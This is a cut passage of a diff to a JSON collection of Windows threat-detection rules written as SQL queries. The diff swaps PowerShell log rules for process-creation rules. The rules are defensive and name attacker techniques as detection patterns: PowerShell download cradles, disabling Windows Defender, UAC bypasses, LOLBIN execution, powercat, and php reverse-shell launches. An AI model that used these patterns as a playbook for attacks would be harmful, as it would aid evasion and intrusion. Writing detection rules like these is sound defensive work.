"attack.lateral_movement", - "attack.t1021.006" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%tomcat%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\amigo.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "title": "Suspicious Recursive Takeown", + "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_takeown_recursive_own.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", - "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": "Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows \\\\System32\\\\%' ESCAPE '\\')" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_uac_bypass_trustedpath.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", - "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "title": "OpenWith.exe Executes Specified Binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "The OpenWith.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" ], - "filename": "posh_pc_susp_zip_compress.yml" + "filename": "proc_creation_win_lolbin_openwith.yml" }, { - "title": "Suspicious Non PowerShell WSMAN COM Provider", - "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", - "status": "test", - "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "User Discovery And Export Via Get-ADUser Cmdlet", + "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADUser %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pc_wsman_com_provider_no_powershell.yml" + "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", - "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "title": "New Network Trace Capture Started Via Netsh.EXE", + "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_netsh_packet_capture.yml" }, { - "title": "Alternate PowerShell Hosts", - "id": "d7326048-328b-4d5e-98af-86e84b17c765", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Php Inline Command Execution", + "id": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", + "status": "experimental", + "description": "Detects execution of php using the \"-r\" flag. This is could be used as a way to launch a reverse shell or execute live php code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT (HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\' OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR OriginalFileName = 'php.exe') AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "posh_pc_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_php_inline_command_execution.yml" }, { - "title": "PowerShell Downgrade Attack - PowerShell", - "id": "6331d09b-4785-4c13-980f-f96661356249", - "status": "experimental", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", + "title": "UAC Bypass Using Disk Cleanup", + "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "status": "test", + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pc_downgrade_attack.yml" + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" }, { - "title": "Nslookup PowerShell Download Cradle", - "id": "999bff6d-dc15-44c9-9f5c-e1051bfc86e1", + "title": "Windows Update Client LOLBIN", + "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", "status": "experimental", - "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", - "author": "Sai Prashanth Pulisetti @pulisettis, Aishwarya Singam", + "description": "Detects code execution via the Windows Update client (wuauclt)", + "author": "FPT.EagleEye Team", "tags": [ + "attack.command_and_control", "attack.execution", - "attack.t1059.001" + "attack.t1105", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%powershell%' ESCAPE '\\' AND HostApplication LIKE '%nslookup%' ESCAPE '\\' AND (HostApplication LIKE '%-q=txt%' ESCAPE '\\' OR HostApplication LIKE '%-querytype=txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "posh_pc_abuse_nslookup_with_dns_records.yml" + "filename": "proc_creation_win_wuauclt_execution.yml" }, { - "title": "Netcat The Powershell Version", - "id": "c5b20776-639a-49bf-94c7-84f912b91c15", - "status": "test", - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "title": "Potential COM Objects Download Cradles Usage - Process Creation", + "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (HostApplication LIKE '%powercat %' ESCAPE '\\' OR HostApplication LIKE '%powercat.ps1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_pc_powercat.yml" + "filename": "proc_creation_win_powershell_download_com_cradles.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", - "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", + "title": "Use of Pcalua For Execution", + "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "status": "experimental", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "author": "frack113", + "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use by a via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" + "filename": "proc_creation_win_lolbin_pcalua.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious HH.EXE Execution", + "id": "e8a95b5e-c891-46e2-b33a-93937d3abc31", + "status": "test", + "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", - "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", "status": "experimental", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "App-V clients" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_syncappvpublishingserver_exe.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", - "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE 